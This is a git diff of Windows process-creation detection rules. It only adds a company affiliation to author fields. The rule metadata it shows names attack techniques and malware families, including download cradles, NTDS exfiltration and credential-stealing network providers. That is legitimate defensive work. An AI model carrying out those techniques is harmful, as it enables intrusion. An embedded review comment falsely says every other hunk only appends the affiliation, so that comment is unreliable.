b/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml 
@@ -4,7 +4,7 @@ status: experimental description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files references: - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/11/24 modified: 2022/06/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml index 278ff0246..449026a83 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml @@ -5,7 +5,7 @@ description: Detects execution of of Dxcap.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/ - https://twitter.com/harr0ey/status/992008180904419328 -author: Beyu Denis, oscd.community, Nasreddine Bencherchali (update) +author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/26 modified: 2022/06/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml index 38893566b..a35b46a0d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors references: - https://twitter.com/0gtweet/status/1526833181831200770 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/19 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_type.yml b/rules/windows/process_creation/proc_creation_win_lolbin_type.yml index f52f1e88b..4062e2954 100644 
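Review bot: The dxcap rule's new author line drops the "(update)" qualifier that followed Nasreddine Bencherchali's name and puts the affiliation in its place, so the field no longer records that this contributor updated rather than originally wrote the rule, unlike every other hunk on this page, which only appends the affiliation. If that distinction is meant to survive, a form such as `+author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems, update)` keeps both; if the project intentionally retires contribution qualifiers, a sentence in the commit description would make that explicit. This physical line holds several file sections; the point applies only to proc_creation_win_lolbin_susp_dxcap.yml.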
--- a/rules/windows/process_creation/proc_creation_win_lolbin_type.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_type.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the "type" command to download/upload data from WebDAV server references: - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/14 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml index 0646b0d2f..9e011e003 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml @@ -4,7 +4,7 @@ status: experimental description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml b/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml index fad930406..277b6c06f 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml 
@@ -10,7 +10,7 @@ description: | references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py -author: Nasreddine Bencherchali, Victor Sergeev, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community date: 2022/05/17 modified: 2022/07/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml b/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml index 49b1b3211..2630c727d 100644 --- a/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml +++ b/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml @@ -7,7 +7,7 @@ references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/07 modified: 2022/10/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mal_adwind.yml b/rules/windows/process_creation/proc_creation_win_mal_adwind.yml index 37f7153ae..287e19af4 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_adwind.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_adwind.yml 
@@ -5,7 +5,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
 references:
 - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
-author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
 date: 2017/11/10
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml b/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml
index b7f534fec..4aded8c27 100644
--- a/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml
+++ b/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml
@@ -6,7 +6,7 @@ references:
 - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
 - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/
 - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/14
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml
index 1d8e4dd7c..136ed2dce 100644
--- a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml
+++ b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
 references:
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml
index 13847df3e..994886b9c 100644
--- a/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml
+++ b/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml
@@ -23,7 +23,7 @@ references:
 - https://github.com/samratashok/nishang
 - https://github.com/DarkCoderSc/PowerRunAsSystem/
 - https://github.com/besimorhino/powercat
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/02
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti.yml b/rules/windows/process_creation/proc_creation_win_malware_conti.yml
index 54ff61a46..b9c3502f7 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_conti.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_conti.yml
@@ -5,7 +5,7 @@ description: Detects a command used by conti to find volume shadow backups
 references:
 - https://twitter.com/vxunderground/status/1423336151860002816?s=20
 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 tags:
 - attack.t1587.001
diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml
index d8352babb..cf2dca9d4 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml
@@ -5,7 +5,7 @@ description: Detects a command used by conti to exfiltrate NTDS
 references:
 - https://twitter.com/vxunderground/status/1423336151860002816?s=20
 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
index 616029c65..54ba2bb46 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/vxunderground/status/1423336151860002816?s=20
 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
 - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_dridex.yml b/rules/windows/process_creation/proc_creation_win_malware_dridex.yml
index 7ecb3c6b9..33bd55e74 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_dridex.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_dridex.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects typical Dridex process patterns
 references:
 - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
-author: Florian Roth, oscd.community
+author: Florian Roth (Nextron Systems), oscd.community
 date: 2019/01/10
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml b/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml
index 21c793a33..3755f913d 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml
@@ -6,7 +6,7 @@ references:
 - https://securelist.com/my-name-is-dtrack/93338/
 - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/
 - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/30
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml
index 45a4cb502..cd0922db3 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml
@@ -7,7 +7,7 @@ references:
 - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/
 - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/
 - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/09/30
 modified: 2022/09/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_formbook.yml b/rules/windows/process_creation/proc_creation_win_malware_formbook.yml
index aeaf469c9..01f1a30ac 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_formbook.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_formbook.yml
@@ -7,7 +7,7 @@ references:
 - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/
 - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/
 - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/
-author: Florian Roth, oscd.community, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
 date: 2019/09/30
 modified: 2022/10/06
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml
index e1724f884..90595d9ab 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml
@@ -5,7 +5,7 @@ description: Detects NotPetya ransomware activity in which the extracted passwor
 references:
 - https://securelist.com/schroedingers-petya/78870/
 - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
-author: Florian Roth, Tom Ueltschi
+author: Florian Roth (Nextron Systems), Tom Ueltschi
 date: 2019/01/16
 modified: 2022/12/15
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_qbot.yml b/rules/windows/process_creation/proc_creation_win_malware_qbot.yml
index 46dfb7913..548c6abfa 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_qbot.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_qbot.yml
@@ -5,7 +5,7 @@ description: Detects QBot like process executions
 references:
 - https://twitter.com/killamjr/status/1179034907932315648
 - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/01
 modified: 2022/08/24
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml b/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml
index 049a1f324..d08f27021 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects Ryuk ransomware activity
 references:
 - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/16
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml b/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml
index 0882dad3b..354cc6c76 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml
@@ -2,7 +2,7 @@ title: WScript or CScript Dropper
 id: cea72823-df4d-4567-950c-0b579eaf0846
 status: test
 description: Detects wscript/cscript executions of scripts located in user directories
-author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community
+author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
 date: 2019/01/16
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml b/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml
index a5ea151e0..b6fee5fdb 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml
@@ -5,7 +5,7 @@ description: Detects Trickbot malware process tree pattern in which rundll32.exe
 references:
 - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20
 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/11/26
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml b/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml
index c9b230d3a..0d0b4dd09 100644
--- a/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml
+++ b/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects WannaCry ransomware activity
 references:
 - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-author: Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
 date: 2019/01/16
 modified: 2022/02/24
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_msdt.yml b/rules/windows/process_creation/proc_creation_win_msdt.yml
index f7891da47..cd7e06376 100644
--- a/rules/windows/process_creation/proc_creation_win_msdt.yml
+++ b/rules/windows/process_creation/proc_creation_win_msdt.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/nao_sec/status/1530196847679401984
 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
 - https://twitter.com/_JohnHammond/status/1531672601067675648
-author: Nasreddine Bencherchali (rule)
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/05/29
 modified: 2023/01/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml
index 83e577291..98398220f 100644
--- a/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml
+++ b/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
 references:
 - https://twitter.com/nas_bench/status/1537896324837781506
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/21
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml b/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml
index 550c1dbee..bca252623 100644
--- a/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet
 references:
 - https://twitter.com/mrd0x/status/1478234484881436672?s=12
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml b/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml
index 6d2353f98..05cf509a3 100644
--- a/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml
+++ b/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the Installation of a Exchange Transport Agent
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/08
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_mshta_http.yml b/rules/windows/process_creation/proc_creation_win_mshta_http.yml
index fe89e91a1..9630ed124 100644
--- a/rules/windows/process_creation/proc_creation_win_mshta_http.yml
+++ b/rules/windows/process_creation/proc_creation_win_mshta_http.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
 references:
 - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/08
 modified: 2022/08/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml b/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml
index d78acc24a..602ceb643 100644
--- a/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml
+++ b/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml
@@ -5,7 +5,7 @@ related:
 type: similar
 status: experimental
 description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/28
 references:
 - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
diff --git a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml
index 2878c31cc..602a9ec13 100644
--- a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml
+++ b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml
@@ -6,7 +6,7 @@ references:
 - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html
 - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
 - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/01
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_net_recon.yml b/rules/windows/process_creation/proc_creation_win_net_recon.yml
index a5edaf179..8b621f644 100644
--- a/rules/windows/process_creation/proc_creation_win_net_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_net_recon.yml
@@ -6,7 +6,7 @@ references:
 - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
 - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
 - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
-author: Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali
 date: 2019/01/16
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml b/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml
index eb9804982..0d88a2031 100644
--- a/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml
+++ b/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects creation of local users via the net.exe command with the option "never expire"
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/12
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml
index 8d0415a03..a0c717778 100644
--- a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml
+++ b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml
@@ -6,7 +6,7 @@ references:
 - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
 - https://adepts.of0x.cc/netsh-portproxy-code/
 - https://www.dfirnotes.net/portproxy_detection/
-author: Florian Roth, omkar72, oscd.community
+author: Florian Roth (Nextron Systems), omkar72, oscd.community
 date: 2019/01/29
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml
index 7bce65719..b969f4291 100644
--- a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml
+++ b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP
 references:
 - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
-author: Florian Roth, oscd.community
+author: Florian Roth (Nextron Systems), oscd.community
 date: 2019/01/29
 modified: 2022/11/14
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_new_network_provider.yml b/rules/windows/process_creation/proc_creation_win_new_network_provider.yml
index 0a3f5919a..a01b0e22e 100644
--- a/rules/windows/process_creation/proc_creation_win_new_network_provider.yml
+++ b/rules/windows/process_creation/proc_creation_win_new_network_provider.yml
@@ -8,7 +8,7 @@ description: Detects when an attacker tries to add a new network provider in ord
 references:
 - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade
 - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/23
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_node_abuse.yml
index 9f3f670c7..7602c5a3f 100644
--- a/rules/windows/process_creation/proc_creation_win_node_abuse.yml
+++ b/rules/windows/process_creation/proc_creation_win_node_abuse.yml
@@ -7,7 +7,7 @@ references:
 - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return
 - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/
 - https://nodejs.org/api/cli.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_nps.yml b/rules/windows/process_creation/proc_creation_win_nps.yml
index 1f517b76e..44daef5c5 100644
--- a/rules/windows/process_creation/proc_creation_win_nps.yml
+++ b/rules/windows/process_creation/proc_creation_win_nps.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of NPS a port forwarding tool
 references:
 - https://github.com/ehang-io/nps
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/10/08
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
index 4a10ff9e0..adee3b066 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
@@ -9,7 +9,7 @@ status: experimental
 description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
 references:
 - https://twitter.com/Alh4zr3d/status/1566489367232651264
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/05
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml
index da5168e98..c99274158 100644
--- a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml
@@ -5,7 +5,7 @@ description: Detects use of an encoded/obfuscated version of an IP address (hex,
 references:
 - https://h.43z.one/ipconverter/
 - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/03
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml
index 102c3cba6..6d4f429ff 100644
--- a/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml
@@ -5,7 +5,7 @@ description: Detects usage of an encoded/obfuscated version of an IP address (he
 references:
 - https://h.43z.one/ipconverter/
 - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/03
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml b/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml
index 0fe0ed302..fa7032332 100644
--- a/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Office Applications executing a Windows child process including directory traversal patterns
 references:
 - https://twitter.com/sbousseaden/status/1531653369546301440
-author: '@SBousseaden (idea), Christian Burkard (rule)'
+author: '@SBousseaden (idea), Christian Burkard (Nextron Systems) (rule)'
 date: 2022/06/02
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_office_shell.yml b/rules/windows/process_creation/proc_creation_win_office_shell.yml
index c03ae9eea..bc7cf180e 100644
--- a/rules/windows/process_creation/proc_creation_win_office_shell.yml
+++ b/rules/windows/process_creation/proc_creation_win_office_shell.yml
@@ -5,7 +5,7 @@ description: Detects a Windows command and scripting interpreter executable star
 references:
